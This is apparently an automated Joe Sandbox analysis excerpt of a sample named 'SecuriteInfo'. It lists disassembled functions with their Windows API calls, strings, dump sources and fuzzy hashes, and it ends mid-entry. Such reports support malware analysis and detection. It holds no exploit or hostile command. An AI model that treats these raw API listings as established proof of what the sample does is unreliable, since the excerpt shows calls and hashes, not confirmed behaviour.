                    • Opcode ID: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                    • Instruction ID: e6c3e20f3f4f589de30df119eb5ac39dff6a05f99dd0b8fcb25ba6c38d6e5d13
                    • Opcode Fuzzy Hash: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                    • Instruction Fuzzy Hash: D1415874A05245EFDB15DF64E884EDABBB9FF49310F14802AED5697360E738A920CB50
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 007D77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 007D77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007D77FA
                    • DeleteDC.GDI32(00000000), ref: 007D7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 007D780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: fe597c3e1f009e57d8bbd3640aa7ba4501f9121cab542b731e67d5f30f83656d
                    • Instruction ID: 005aa33ef87617caa9841338484d45b8d20bb3fd4b2d5ff701976a0a4b6e3ef5
                    • Opcode Fuzzy Hash: fe597c3e1f009e57d8bbd3640aa7ba4501f9121cab542b731e67d5f30f83656d
                    • Instruction Fuzzy Hash: 8F316D31105219EBDF159FA4DC09FDA3B79FF09321F118226FA16A62A0D739D821DBA4
                    APIs
                    • _memset.LIBCMT ref: 0077707B
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • __gmtime64_s.LIBCMT ref: 00777114
                    • __gmtime64_s.LIBCMT ref: 0077714A
                    • __gmtime64_s.LIBCMT ref: 00777167
                    • __allrem.LIBCMT ref: 007771BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007771D9
                    • __allrem.LIBCMT ref: 007771F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0077720E
                    • __allrem.LIBCMT ref: 00777225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777243
                    • __invoke_watson.LIBCMT ref: 007772B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 8aa4718af0ed251f67180e8f8336bdae3396fbf4bd8ca56ff95dd5874227accb
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: B671F771A44707EBDB18AE79CC45B6AB3B8BF507A4F14C23AF518D6682E778D900C790
                    APIs
                    • _memset.LIBCMT ref: 007B2A31
                    • GetMenuItemInfoW.USER32(00816890,000000FF,00000000,00000030), ref: 007B2A92
                    • SetMenuItemInfoW.USER32(00816890,00000004,00000000,00000030), ref: 007B2AC8
                    • Sleep.KERNEL32(000001F4), ref: 007B2ADA
                    • GetMenuItemCount.USER32(?), ref: 007B2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 007B2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 007B2B64
                    • GetMenuItemID.USER32(?,?), ref: 007B2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                    • Instruction ID: dee3fa73bb35f861feb99633efd6159870cbcdba681b9d9a054c1dc12e681c82
                    • Opcode Fuzzy Hash: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                    • Instruction Fuzzy Hash: E4619FB0902249AFDB11CF64DC88EFF7BB8EB05304F148559E85297252EB39AD16DB21
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 007D723B
                    • _memset.LIBCMT ref: 007D724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                    • Instruction ID: ec9bf24cfd64cb6ec59cabe6ebaff50d952fc938fa7741dd3774c23ed1787713
                    • Opcode Fuzzy Hash: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                    • Instruction Fuzzy Hash: 85616A71900248AFDB10DFA4CC81EEE77B8FF09700F14416AFA55AB3A1E778A955DB60
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 007A718E
                    • VariantInit.OLEAUT32(?), ref: 007A71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007A71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 007A7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007A7227
                    • VariantClear.OLEAUT32(?), ref: 007A723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007A7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A7252
                    • VariantClear.OLEAUT32(?), ref: 007A7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                    • Instruction ID: f1d4741962e4b8941472f66d02966a8289bb5606b29c76b24128692c7ba38128
                    • Opcode Fuzzy Hash: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                    • Instruction Fuzzy Hash: 8C413D35900219EFCB04DF64DC48AAEBBB8FF49354F00C169E956A7261CB78A945CFA0
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CoInitialize.OLE32 ref: 007C8718
                    • CoUninitialize.OLE32 ref: 007C8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C8783
                    • IIDFromString.OLE32(?,?), ref: 007C87F6
                    • VariantInit.OLEAUT32(?), ref: 007C8890
                    • VariantClear.OLEAUT32(?), ref: 007C88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 5917474063cc7242161dcd51e184c3038ddee0848b12a1affdcd1180b9f96d4e
                    • Instruction ID: 075018921f997d6537d5f103ac39327009e84f8a2c09953b20afe7f128f12d2a
                    • Opcode Fuzzy Hash: 5917474063cc7242161dcd51e184c3038ddee0848b12a1affdcd1180b9f96d4e
                    • Instruction Fuzzy Hash: C8617870608301EFD750DB64C848F6ABBE8AF89714F14491EF9859B291DB78ED48CB93
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 007C5AA6
                    • inet_addr.WSOCK32(?,?,?), ref: 007C5AEB
                    • gethostbyname.WSOCK32(?), ref: 007C5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 007C5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C5C00
                    • WSACleanup.WSOCK32 ref: 007C5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 917d3d44bd2496724df078d4004fb83b9ceb2b1d30bf9be4b2f2652ec91b5ce5
                    • Instruction ID: 1d330fcbf876e61e2b6cc1b9415f9b2071caebc822a2a9e16834419b0e15b793
                    • Opcode Fuzzy Hash: 917d3d44bd2496724df078d4004fb83b9ceb2b1d30bf9be4b2f2652ec91b5ce5
                    • Instruction Fuzzy Hash: CB516A71604701DFDB209F24C849F6ABBE4EB44310F14892EF956DB2A1DB79FC448B55
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB7B1
                    • GetLastError.KERNEL32 ref: 007BB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007BB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                    • Instruction ID: ff0cba0e87fb21518449493418a2e056f609604e1d8d76e820356dcf828760de
                    • Opcode Fuzzy Hash: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                    • Instruction Fuzzy Hash: 1E318235A00209DFDB04EF64CC89BEE77B8FF84710F14802AE902D7291DBB99946C791
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A94F6
                    • GetDlgCtrlID.USER32 ref: 007A9501
                    • GetParent.USER32 ref: 007A951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9520
                    • GetDlgCtrlID.USER32(?), ref: 007A9529
                    • GetParent.USER32(?), ref: 007A9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                    • Instruction ID: 08724a79b6b88ac44402238014b6a691cca4d34018d1f3295fbd10bb39c97543
                    • Opcode Fuzzy Hash: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                    • Instruction Fuzzy Hash: 7B21A370D00104FBCF059B64CC89DEEBB75EF8A300F104216F962972E2DB7D9929DA20
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A95DF
                    • GetDlgCtrlID.USER32 ref: 007A95EA
                    • GetParent.USER32 ref: 007A9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9609
                    • GetDlgCtrlID.USER32(?), ref: 007A9612
                    • GetParent.USER32(?), ref: 007A962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                    • Instruction ID: b173e6d14b590081fd8d49b943c647ab68e84662442f0a82ab2a9c2d6789e735
                    • Opcode Fuzzy Hash: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                    • Instruction Fuzzy Hash: 4D21A474D01104BBDF05AB60CC89EFEBB75EF49300F104116F962972E2DB7D9529DA20
                    APIs
                    • GetParent.USER32 ref: 007A9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 007A9666
                    • _wcscmp.LIBCMT ref: 007A9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                    • Instruction ID: bf71c48d9247deb53078dd23ab69c56f3758d00ea6d6471590a6af07cb3bed9c
                    • Opcode Fuzzy Hash: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                    • Instruction Fuzzy Hash: 4A112977248307FAFA112621DC0BDE6779CDF46770F204226FB15E50D2FEAE69205958
                    APIs
                    • __swprintf.LIBCMT ref: 007B419D
                    • __swprintf.LIBCMT ref: 007B41AA
                      • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 007B41E0
                    • LockResource.KERNEL32(00000000), ref: 007B41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 007B420D
                    • LoadResource.KERNEL32(?,00000000), ref: 007B421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 007B422E
                    • LockResource.KERNEL32(?), ref: 007B423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                    • Instruction ID: 2ae77b4dbed4755789f0c56a71048ce745354da3ce1cb21ede51acd0314912be
                    • Opcode Fuzzy Hash: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                    • Instruction Fuzzy Hash: FE319271A0521AABDB119FA0DC48EFF7BBDFF08341F008529F906D6152E738DA519BA4
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 0075FCA5
                    • UnregisterHotKey.USER32(?), ref: 0075FDFC
                    • DestroyWindow.USER32(?), ref: 00794A00
                    • FreeLibrary.KERNEL32(?), ref: 00794A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                    • Instruction ID: 1482d2b7ab27142e979d61e7afd37bef1cb22b7e68837d1a223b61546660cdae
                    • Opcode Fuzzy Hash: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                    • Instruction Fuzzy Hash: 04A19E70701212CFCB29EF14D899EA9F764EF04701F1482ADE90AAB251DB78ED16CF94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-1439926319
                    • Opcode ID: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                    • Instruction ID: 526f02aa8883b03e9f5b3ebd566efc704cafb0ce3aa34b1a6847b213bb67cccb
                    • Opcode Fuzzy Hash: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                    • Instruction Fuzzy Hash: B5919D71A00219EBDF64DFA5D848FAEBBB8EF45710F10815DFA15AB280D7789905CFA0
                    APIs
                    • EnumChildWindows.USER32(?,007AAA64), ref: 007AA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                    • Instruction ID: d208af2aa62b41fae6551e868608e3000be3184ee39fa27290e98e355b6a49de
                    • Opcode Fuzzy Hash: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                    • Instruction Fuzzy Hash: 3791B270A00606EBCF58DF70C485BEAFB74BF45340F108219D99AA7181DF387A59CB91
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
                      • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
                      • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
                      • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
                    • GetDC.USER32 ref: 0078CF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CF95
                    • SelectObject.GDI32(00000000,00000000), ref: 0078CFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 0078CFB8
                    • ReleaseDC.USER32(?,00000000), ref: 0078CFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078D04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
